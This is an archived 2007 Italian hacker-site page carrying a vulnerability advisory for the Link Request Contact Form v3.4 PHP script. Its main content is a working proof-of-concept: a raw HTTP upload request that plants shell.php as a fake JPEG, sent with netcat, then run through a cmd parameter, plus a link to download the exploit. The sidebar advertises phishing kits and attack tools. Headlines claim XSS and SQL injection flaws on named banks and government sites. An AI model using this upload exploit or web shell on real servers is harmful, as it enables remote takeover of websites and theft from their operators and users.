CorryL Laboratory




	Home Archivio News Forum Area Privata Download Gallery Mappa Sito Traduttore	Data : 24/11/2009 Ora : 10:49

Servizi

» Segnala News
» Cerca
» Headlines
» Backend

Cerca

Statistiche

Statistiche

Recent files

» google-gadget-e...
» fscan.rar
» rats-2.1.rar
» perl-md5-crack.zip
» ironscanner.rar
» Phishing Su Ban...

Top downloads

(1476) Phishing Su Ban...
(523) ironscanner.rar
(401) XSSShell039.zip
(384) perl-md5-crack.zip
(368) exploit-LRCF-v3...
(291) rats-2.1.rar

» Statistiche Download

Licenza

Questo/a opera è pubblicato sotto una Licenza Creative Commons.

Newsletter

Share File

Top 100

Publicita'

Link Request Contact Form v3.4 Remote Code Injection

-=[--------------------ADVISORY-------------------]=-

Link Request Contact Form v3.4

Author: CorryL [corryl80@gmail.com]
-=[-----------------------------------------------]=-

-=[+] Application: Link Request Contact Form
-=[+] Version: 3.4
-=[+] Vendor's URL: http://www.americanfinancing.net/link-request-contact-form.cfm
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Remote code injection
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: http://corryl.altervista.org/
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck

..::[ Descriprion ]::..

Link Request Contact Form v3.4 is designed to let your friends or clients request to add their website link(s)
banner(s) to your website.
User can upload their banner(s) to a directory being a JPG or GIF file for your review before you post their listing(s).
Once the user fills in all the details an email will be sent to you with the file location and the users details.
The script will also email your client with a Confirmation email providing them with the same details.
You can modify the script to your liking and change the location of where the files will be store easily.
There are no restrictions and easy installation instructions are provided.

..::[ Bug ]::..

This software is affection from a bug type remote code injection,
a remote attacker is able' to injecting of the code inside the server victim,
to subsequently be performed.
This happens because' the script allows to insert an image jpg or bmp,
but not checking the data, and allowing of injecting of the code php.

..::[ Proof Of Concept ]::..

cut the exploit.txt edit the server-victim information,
using netcat to sending the exploit to server.

nc server-victim 80 < exploit.txt

open the browser and connection to http://server-victim/uploads/shell.php?cmd=uname -a

<---------cut here exploit.txt--------->
POST http://server-victim:80/output.php HTTP/1.1
Host: www.server-victim.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; it; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/prova/link-request-contact-form.html
Cookie: PHPSESSID=0654c063218badc1ad8b5a04edf9198d
Content-Type: multipart/form-data; boundary=---------------------------190291279311134
Content-length: 1115

-----------------------------190291279311134
Content-Disposition: form-data; name="Full_Name"

aaa
-----------------------------190291279311134
Content-Disposition: form-data; name="email"

aa@aa.aa
-----------------------------190291279311134
Content-Disposition: form-data; name="Link_Back"

http://127.0.0.1/
-----------------------------190291279311134
Content-Disposition: form-data; name="Site_Title"

aa
-----------------------------190291279311134
Content-Disposition: form-data; name="You_Web_Address"

http://127.0.0.1/
-----------------------------190291279311134
Content-Disposition: form-data; name="Site_Description"

aaa
-----------------------------190291279311134
Content-Disposition: form-data; name="upload"; filename="shell.php"
Content-Type: image/jpeg

-----------------------------190291279311134
Content-Disposition: form-data; name="Submit"

Submit
-----------------------------190291279311134--

<----------------end cut---------------->

download the netcat+exploit from my server:

http://corryl.altervista.org/index.php?mod=Download/Exploit#exploit-LRCF-v3.4.rar

Postato Domenica 10 Giugno 2007 - 12:01 (letto 2091 volte)

Commenti | Aggiungi commento | Stampa

« Notizia precedente | Notizia successiva »

Le ultime notizie relative a questo argomento

XSS Su Google Gadget!!!! (28/04/2008 - 19:05) letto 819 volte
Read

politicheagricole.it Vulnerable to XSS (28/04/2008 - 17:41) letto 636 volte
Read

www.camera.it Vulnerable to XSS (Camera Dei Deputati) (27/04/2008 - 18:49) letto 610 volte
Read

XSS su Banca Carime (05/08/2007 - 19:44) letto 1200 volte
Read

Sql Injection su Banca Arner (04/08/2007 - 15:04) letto 1132 volte
Read

XSS su Banca Carim (www.bancacarim.it) (29/07/2007 - 19:41) letto 1744 volte
Read

XSS & Sql Injection sulla banca Cassa di Risparmio di Alessandria (27/07/2007 - 19:32) letto 1060 volte
Read

Un Sql injection su BNL (27/07/2007 - 16:45) letto 967 volte
Read